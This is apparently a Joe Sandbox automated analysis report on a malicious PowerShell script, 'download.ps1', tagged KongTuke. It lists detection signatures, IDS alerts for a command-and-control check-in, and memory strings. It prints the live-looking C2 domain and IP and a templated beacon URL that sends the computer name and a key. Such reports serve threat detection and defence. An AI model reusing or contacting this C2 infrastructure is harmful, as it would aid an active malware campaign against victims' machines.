Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1582439
MD5:f6ab611e38035ef4886d5526e7b9a88a
SHA1:8569435224c6c52737fb5114a073e62a1a32de21
SHA256:1522bd349cec20303ee2c3bf624f52e02b179bc5fc597bec575f7d34c213b3e5
Tags:KongTukeps1user-monitorsg
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Suricata IDS alerts for network traffic
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 2008 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 2008, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 2008, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-30T16:14:02.027665+010020577411A Network Trojan was detected192.168.2.44973045.61.136.13880TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-30T16:14:02.027665+010018100001Potentially Bad Traffic192.168.2.44973045.61.136.13880TCP
2024-12-30T16:14:02.666431+010018100001Potentially Bad Traffic192.168.2.449731142.250.185.13280TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 85.1% probability
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1718205013.00000287D9A94000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb6 source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb?W source: powershell.exe, 00000000.00000002.1777765113.00000287F3F0C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1776433266.00000287F3D90000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1779315827.00000287F4190000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1718205013.00000287D9A94000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: gement.Automation.pdbdb\ source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdbx source: powershell.exe, 00000000.00000002.1778633900.00000287F3F30000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbf source: powershell.exe, 00000000.00000002.1776433266.00000287F3D90000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49731 -> 142.250.185.132:80
Source: Network trafficSuricata IDS: 1810000 - Severity 1 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49730 -> 45.61.136.138:80
Source: Network trafficSuricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.2.4:49730 -> 45.61.136.138:80
Queries Google from non browser process on port 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
Source: global trafficHTTP traffic detected: GET /du64swbeqthtr.php?id=user-PC&key=115667688416&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kdemjgebjimkanl.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /du64swbeqthtr.php?id=user-PC&key=115667688416&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: kdemjgebjimkanl.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: kdemjgebjimkanl.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DF00E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DECEA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$tjwe1cgqifoz4l3/$6tmq9zsu3l0ofg4.php?id=$env:computername&key=$nwbirdhamkxfje&s=527
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.1776222589.00000287F3C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD433000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kdemjgebjimkanl.top
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kdemjgebjimkanl.top/du64swbeqthtr.php?id=user-PC&key=115667688416&s=527
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.1767672083.00000287EBB62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE344000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE358000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE022000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE01E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE34E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE027000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE35D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE031000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE33F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE362000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DE045000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1719127106.00000287DBAF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD433000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD43A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.1719127106.00000287DBAF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBCCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD56A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.1767672083.00000287EBB62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1767672083.00000287EBB62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1767672083.00000287EBB62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD43A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1719127106.00000287DEB06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD56A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBCCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.1767672083.00000287EBB62000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD56A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD56A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/url?q=https://www.google.com/search%3Fq%3DPresident%2BJimmy%2BCarter%26source
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD56A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD56A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7A81260_2_00007FFD9B7A8126
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7A8ED20_2_00007FFD9B7A8ED2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B79208D0_2_00007FFD9B79208D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7A0EFA0_2_00007FFD9B7A0EFA
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBCCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ3LGyg2IsbEukvOODILlOU0K_Xf7S6S3" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="QRSgWh_fnsVpcixOprXVSA">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br><div id="K7FuCf"><style>.U8K5Lc{font-size:small;margin-bottom:32px}.U8K5Lc a.qDTOof{display:inline-block;text-decoration:none}.U8K5Lc img{border:none;margin-right:5px;vertical-align:middle}</style><div class="U8K5Lc" data-ved="0ahUKEwjWuPCZ5M-KAxW3RPEDHbFnCoMQnIcBCAU"><a href="https://www.google.com/url?q=https://www.google.com/search%3Fq%3DPresident%2BJimmy%2BCarter%26source%3Dsmp.2023carterhpp.2%26stick%3DH4sIAAAAAAAA_zu04eRyNhYpJgGGW-cOnOVk4mAAAAs3vRsSAAAA&amp;source=hpp&amp;id=19046191&amp;ct=3&amp;usg=AOvVaw1DdLddPyaDlZCddFvNE2w3&amp;sa=X&amp;ved=0ahUKEwjWuPCZ5M-KAxW3RPEDHbFnCoMQ8IcBCAY" rel="nofollow">President Jimmy Carter, 1924 - 2024</a></div></div></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="QRSgWh_fnsVpcixOprXVSA">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="QRSgWh_fnsVpcixOprXVSA">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIAB
Source: powershell.exe, 00000000.00000002.1719127106.00000287DD56A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
Source: powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4wX
